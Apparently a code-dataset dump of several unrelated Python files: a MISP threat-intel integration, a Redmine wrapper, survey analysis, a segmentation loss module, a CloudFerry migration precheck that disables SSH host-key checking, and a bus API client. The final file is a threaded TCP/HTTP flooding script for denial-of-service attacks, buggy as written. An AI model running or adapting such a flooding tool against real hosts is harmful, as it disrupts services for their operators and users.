demisto_args.get('url') url_parse = urlparse(url) url_obj = [{'url': url}] url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None url_obj.append({'query_string': url_parse.query}) if url_parse.query else None url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None url_obj.append({'port': url_parse.port}) if url_parse.port else None url_obj.append( {'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args)) g_object = build_generic_object('url', url_obj) return add_object(event_id, g_object) def add_generic_object_command(demisto_args: dict): event_id = demisto_args.get('event_id') template = demisto_args.get('template') attributes = demisto_args.get('attributes').replace("'", '"') try: args = json.loads(attributes) if not isinstance(args, list): args = dict_to_generic_object_format(args) obj = build_generic_object(template, args) return add_object(event_id, obj) except ValueError as e: raise DemistoException( f'`attribute` parameter could not be decoded, may not a valid JSON\nattribute: {attributes}', str(e)) def convert_arg_to_misp_args(demisto_args, args_names): return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)] def add_ip_object(demisto_args: dict): event_id = demisto_args.get('event_id') ip_object_args = [ 'dst_port', 'src_port', 'domain', 'hostname', 'ip_src', 'ip_dst' ] # converting args to MISP's arguments types misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args) ips = argToList(demisto_args.get('ip')) for ip in ips: misp_attributes_args.append({'ip': ip}) if misp_attributes_args: non_req_args = [ 'first_seen', 'last_seen', ] misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args)) misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None obj = build_generic_object('ip-port', misp_attributes_args) return add_object(event_id, obj) else: raise DemistoException( f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}') def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids): """ Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the suspicious tag ids set and will be stayed only in the malicious one (as a tag that was configured to be malicious is stronger than recognised as suspicious). """ common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids) suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids} return malicious_tag_ids, suspicious_tag_ids def is_tag_list_valid(tag_ids): """Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers.""" for tag in tag_ids: try: tag = int(tag) if tag <= 0: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") except ValueError: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute: attribute_type = demisto_args.get('type') distribution = demisto_args.get('distribution') category = demisto_args.get('category') comment = demisto_args.get('comment') value = demisto_args.get('value') first_seen = demisto_args.get('first_seen') last_seen = demisto_args.get('last_seen') attribute_instance = MISPAttribute() attribute_instance.uuid = attribute_uuid if attribute_type: attribute_instance.type = attribute_type if distribution: attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution] if category: attribute_instance.category = category if value: attribute_instance.value = value if comment: attribute_instance.comment = comment if first_seen: attribute_instance.first_seen = first_seen if last_seen: attribute_instance.last_seen = last_seen return attribute_instance def update_attribute_command(demisto_args: dict) -> CommandResults: attribute_uuid = demisto_args.get('attribute_uuid') attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid) attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid) if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'): raise DemistoException(attribute_instance_response.get('errors')) human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n" attribute = attribute_instance_response.get('Attribute') convert_timestamp_to_readable(attribute, None) parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=parsed_attribute_data, ) def main(): params = demisto.params() malicious_tag_ids = argToList(params.get('malicious_tag_ids')) suspicious_tag_ids = argToList(params.get('suspicious_tag_ids')) reliability = params.get('integrationReliability', 'B - Usually reliable') if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter") attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True) command = demisto.command() demisto.debug(f'[MISP V3]: command is {command}') args = demisto.args() try: malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids) if command == 'test-module': return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, attributes_limit=attributes_limit)) elif command == 'misp-create-event': return_results(create_event_command(args)) elif command == 'misp-add-attribute': return_results(add_attribute(demisto_args=args)) elif command == 'misp-search-events': return_results(search_events(args)) elif command == 'misp-search-attributes': return_results(search_attributes(args)) elif command == 'misp-delete-event': return_results(delete_event(args)) elif command == 'misp-add-sighting': return_results(add_sighting(args)) elif command == 'misp-add-tag-to-event': return_results(add_tag(args)) elif command == 'misp-add-tag-to-attribute': return_results(add_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-remove-tag-from-event': return_results(remove_tag(args)) elif command == 'misp-remove-tag-from-attribute': return_results(remove_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-add-events-from-feed': return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES)) elif command == 'file': return_results( generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'url': return_results( generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'ip': return_results( generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'domain': return_results( generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'email': return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'misp-add-file-object': return_results(add_file_object(args)) elif command == 'misp-add-domain-object': return_results(add_domain_object(args)) elif command == 'misp-add-url-object': return_results(add_url_object(args)) elif command == 'misp-add-ip-object': return_results(add_ip_object(args)) elif command == 'misp-add-object': return_results(add_generic_object_command(args)) elif command == 'misp-update-attribute': return_results(update_attribute_command(args)) except PyMISPError as e: return_error(e.message) except Exception as e: return_error(str(e)) if __name__ in ['__main__', '__builtin__', 'builtins']: main()
2.171875
2
redmine/__init__.py
hugoseabra/redmine-task-generator
0
1894
from django.conf import settings from redminelib import Redmine as DefaultRedmine from .validator import RedmineInstanceValidator class Redmine(DefaultRedmine): def __init__(self, url=None, key=None): url = url or settings.REDMINE_BASE_URL key = key or settings.REDMINE_API_KEY super().__init__(url=url, key=key) self.validator = RedmineInstanceValidator(client=self) @property def score_field(self): return self.validator.score_field def instance_errors(self): errors = list() if self.validator.track_errors: errors += self.validator.track_errors if self.validator.score_field_errors: errors += self.validator.score_field_errors return errors def instance_valid(self) -> bool: return self.validator.instance_valid() def project_valid(self, project_id) -> bool: return self.validator.project_valid(project_id)
2.109375
2
python_survey/finished_files/main.py
trenton3983/PyCharmProjects
0
1895
<gh_stars>0 import pandas as pd import numpy as np import matplotlib.pyplot as plt import scipy.stats from finished_files.survey_data_dictionary import DATA_DICTIONARY # Load data # We want to take the names list from our data dictionary names = [x.name for x in DATA_DICTIONARY] # Generate the list of names to import usecols = [x.name for x in DATA_DICTIONARY if x.usecol] # dtypes should be a dict of 'col_name' : dtype dtypes = {x.name : x.dtype for x in DATA_DICTIONARY if x.dtype} # same for converters converters = {x.name : x.converter for x in DATA_DICTIONARY if x.converter} df = pd.read_csv('data/survey.csv', header=0, names=names, dtype=dtypes, converters=converters, usecols=usecols) #%% Clean up data: remove disqualified users # In the survey, any user who selected they don't use Python was then # disqualified from the rest of the survey. So let's drop them here. df = df[df['python_main'] != 'No, I don’t use Python for my current projects'] # Considering we now only have two categories left: # - Yes # - No, I use Python for secondary projects only # Let's turn it into a bool df['python_main'] = df['python_main'] == 'Yes' #%% Plot the web dev / data scientist ratio # In the survey, respondents were asked to estimate the ratio between # the amount of web developers vs the amount of data scientists. Afterwards # they were asked what they thought the most popular answer would be. # Let's see if there's a difference! # This is a categorical data point, and it's already ordered in the data # dictionary. So we shouldn't sort it after counting the values. ratio_self = df['webdev_science_ratio_self'].value_counts(sort=False) ratio_others = df['webdev_science_ratio_others'].value_counts(sort=False) # Let's draw a bar chart comparing the distributions fig = plt.figure() ax = fig.add_subplot(111) RATIO_COUNT = ratio_self.count() x = np.arange(RATIO_COUNT) WIDTH = 0.4 self_bars = ax.bar(x-WIDTH, ratio_self, width=WIDTH, color='b', align='center') others_bars = ax.bar(x, ratio_others, width=WIDTH, color='g', align='center') ax.set_xlabel('Ratios') ax.set_ylabel('Observations') labels = [str(lbl) for lbl in ratio_self.index] ax.set_xticks(x - 0.5 * WIDTH) ax.set_xticklabels(labels) ax.legend((self_bars[0], others_bars[0]), ('Self', 'Most popular')) plt.show() #%% Calculate the predicted totals # Let's recode the ratios to numbers, and calculate the means CONVERSION = { '10:1': 10, '5:1' : 5, '2:1' : 2, '1:1' : 1, '1:2' : 0.5, '1:5' : 0.2, '1:10': 0.1 } self_numeric = df['webdev_science_ratio_self'] \ .replace(CONVERSION.keys(), CONVERSION.values()) others_numeric = df['webdev_science_ratio_others'] \ .replace(CONVERSION.keys(), CONVERSION.values()) print(f'Self:\t\t{self_numeric.mean().round(2)} web devs / scientist') print(f'Others:\t\t{others_numeric.mean().round(2)} web devs / scientist') #%% Is the difference statistically significant? result = scipy.stats.chisquare(ratio_self, ratio_others) # The null hypothesis is that they're the same. Let's see if we can reject it print(result)
3.390625
3
adet/modeling/embedmask/mask_pred.py
yinghdb/AdelaiDet
3
1896
import torch from torch.nn import functional as F from torch import nn from torch.autograd import Variable from adet.utils.comm import compute_locations, aligned_bilinear def dice_coefficient(x, target): eps = 1e-5 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) intersection = (x * target).sum(dim=1) union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps loss = 1. - (2 * intersection / union) return loss def lovasz_grad(gt_sorted): """ Computes gradient of the Lovasz extension w.r.t sorted errors See Alg. 1 in paper """ p = len(gt_sorted) gts = gt_sorted.sum() intersection = gts - gt_sorted.float().cumsum(0) union = gts + (1 - gt_sorted.float()).cumsum(0) jaccard = 1. - intersection / union if p > 1: # cover 1-pixel case jaccard[1:p] = jaccard[1:p] - jaccard[0:-1] return jaccard def lovasz_hinge(logits, labels): """ Binary Lovasz hinge loss logits: [P] Variable, logits at each prediction (between -\infty and +\infty) labels: [P] Tensor, binary ground truth labels (0 or 1) """ if len(labels) == 0: # only void pixels, the gradients should be 0 return logits.sum() * 0. signs = 2. * labels.float() - 1. errors = (1. - logits * Variable(signs)) errors_sorted, perm = torch.sort(errors, dim=0, descending=True) perm = perm.data gt_sorted = labels[perm] grad = lovasz_grad(gt_sorted) loss = torch.dot(F.relu(errors_sorted), Variable(grad)) return loss def lovasz_loss(x, target): eps = 1e-6 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) x = torch.clamp(x, min=eps, max=1-eps) x = torch.log(x) - torch.log(1 - x) losses = [] for i in range(n_inst): losses.append(lovasz_hinge(x[i], target[i])) loss = torch.stack(losses) return loss def build_mask_pred(cfg): return MaskPred(cfg) class MaskPred(nn.Module): def __init__(self, cfg): super(MaskPred, self).__init__() self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2])) self.register_buffer("_iter", torch.zeros([1])) self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None): if self.training: self._iter += 1 gt_inds = pred_instances.gt_inds gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances]) gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype) losses = {} if len(pred_instances) == 0: dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0 losses["loss_mask"] = dummy_loss else: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) if self.mask_loss_type == "Dice": mask_losses = dice_coefficient(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() elif self.mask_loss_type == "Lovasz": mask_losses = lovasz_loss(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() losses["loss_mask"] = loss_mask * self.mask_loss_alpha return losses else: if len(pred_instances) > 0: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) pred_instances.pred_global_masks = mask_prob return pred_instances def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride): proposal_embed = instances.proposal_embed proposal_margin = instances.proposal_margin im_inds = instances.im_inds dim, m_h, m_w = pixel_embed.shape[-3:] obj_num = proposal_embed.shape[0] pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds] proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1) proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1) mask_var = (pixel_embed - proposal_embed) ** 2 mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3)) assert mask_feat_stride >= self.mask_out_stride assert mask_feat_stride % self.mask_out_stride == 0 mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride)) return mask_prob
2.234375
2
cloudferry/actions/prechecks/check_vmax_prerequisites.py
SVilgelm/CloudFerry
6
1897
# Copyright 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import getpass import logging from cloudferry.lib.base import exception from cloudferry.lib.base.action import action from cloudferry.lib.utils import local from cloudferry.lib.utils import remote_runner LOG = logging.getLogger(__name__) class CheckVMAXPrerequisites(action.Action): """This verifies prerequisites required for NFS to VMAX iSCSI cinder volume migration""" def _iscsiadm_is_installed_locally(self): LOG.info("Checking if iscsiadm tool is installed") try: local.run('iscsiadm --help &>/dev/null') except local.LocalExecutionFailed: msg = ("iscsiadm is not available on the local host. Please " "install iscsiadm tool on the node you running on or " "choose other cinder backend for migration. iscsiadm is " "mandatory for migrations with EMC VMAX cinder backend") LOG.error(msg) raise exception.AbortMigrationError(msg) def _check_local_sudo_password_set(self): current_user = getpass.getuser() if current_user != 'root' and \ self.cfg.migrate.local_sudo_password is None: try: local.sudo('ls') except local.LocalExecutionFailed: msg = ("CloudFerry is running as '{user}' user, but " "passwordless sudo does not seem to be configured on " "current host. Please either specify password in " "`local_sudo_password` config option, or run " "CloudFerry as root user.").format(user=current_user) LOG.error(msg) raise exception.AbortMigrationError(msg) def _ssh_connectivity_between_controllers(self): src_host = self.cfg.src.ssh_host src_user = self.cfg.src.ssh_user dst_host = self.cfg.dst.ssh_host dst_user = self.cfg.dst.ssh_user LOG.info("Checking ssh connectivity between '%s' and '%s'", src_host, dst_host) rr = remote_runner.RemoteRunner(src_host, src_user) ssh_opts = ('-o UserKnownHostsFile=/dev/null ' '-o StrictHostKeyChecking=no') cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts, user=dst_user, host=dst_host) try: rr.run(cmd) except remote_runner.RemoteExecutionError: msg = ("No ssh connectivity between source host '{src_host}' and " "destination host '{dst_host}'. Make sure you have keys " "and correct configuration on these nodes. To verify run " "'{ssh_cmd}' from '{src_host}' node") msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd) LOG.error(msg) raise exception.AbortMigrationError(msg) def run(self, **kwargs): if self.cfg.dst_storage.backend != 'iscsi-vmax': return self._iscsiadm_is_installed_locally() self._ssh_connectivity_between_controllers() self._check_local_sudo_password_set()
1.726563
2
bongo/core.py
codeforamerica/bongo
0
1898
<reponame>codeforamerica/bongo """ A simple wrapper for the Bongo Iowa City bus API. """ import requests as req class Bongo(object): """ A simple Python wrapper for the Bongo Iowa City bus API. """ def __init__(self, format='json'): self.format = format def get(self, endpoint, **kwargs): """Perform a HTTP GET request to the API and return the data.""" if 'format' not in kwargs: kwargs['format'] = self.format url = "http://ebongo.org/api/%s" % (endpoint) response = req.get(url, params=kwargs) return self.convert(response) def convert(self, response): """Convert a request based on the response type.""" content_type = response.headers['content-type'] if content_type == 'application/json': data = response.json elif 'stoplist' in response.url: # The `stoplist` endpoint insists that it's HTML. data = response.json else: data = response.content return data def route(self, tag=None, agency=None, **kwargs): """ Get information on a specific route, or all route listings. >>> Bongo().route('lantern', 'coralville') {"coralville's": {"lantern": "route"}} """ if agency and tag: endpoint = 'route' kwargs['agency'] = agency kwargs['route'] = tag else: endpoint = 'routelist' return self.get(endpoint, **kwargs) def routes(self): """ Same as an empty call to the `route` method. >>> Bongo().routes() {"routes": [1234, 5678, 9999]} """ return self.route() def stop(self, number=None, **kwargs): """ Retrieve information specific to a given stop number. >>> Bongo().stop(8350) {"stop": {"8350": "information"}} """ if number: endpoint = 'stop' kwargs['stopid'] = number else: endpoint = 'stoplist' return self.get(endpoint, **kwargs) def stops(self): """ Same as an empty call to the `stop` method. >>> Bongo().stops() {"stops": [1234, 5678, 9999]} """ return self.stop() def predict(self, number, **kwargs): """ Predict the bus arrival times for a specific stop. >>> Bongo().predict(8350) {"stop": {"8350": "prediction"}} """ endpoint = 'prediction' kwargs['stopid'] = number return self.get(endpoint, **kwargs)
3.203125
3
src/security/tcp_flooding.py
janaSunrise/useful-python-snippets
1
1899
import random import socket import string import sys import threading import time def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None: # Threading support thread_num = 0 thread_num_mutex = threading.Lock() # Utility function def print_status() -> None: global thread_num thread_num_mutex.acquire(True) thread_num += 1 print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...") thread_num_mutex.release() def generate_url_path(): msg = str(string.ascii_letters + string.digits + string.punctuation) data = "".join(random.sample(msg, 5)) return data def attack_() -> None: print_status() url_path = generate_url_path() dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: dos.connect((ip, port)) msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n" dos.send(msg.encode()) except socket.error: print(f"[ERROR] Site may be down | {socket.error}") finally: dos.shutdown(socket.SHUT_RDWR) dos.close() try: host = host.replace("https://", "").replace("http://", "").replace("www.", "") ip = socket.gethostbyname(host) except socket.gaierror: print("[ERROR] Make sure you entered a correct website!") sys.exit(2) all_threads = [] for i in range(request_count): t1 = threading.Thread(target=attack) t1.start() all_threads.append(t1) time.sleep(0.01) for current_thread in all_threads: current_thread.join()
2.890625
3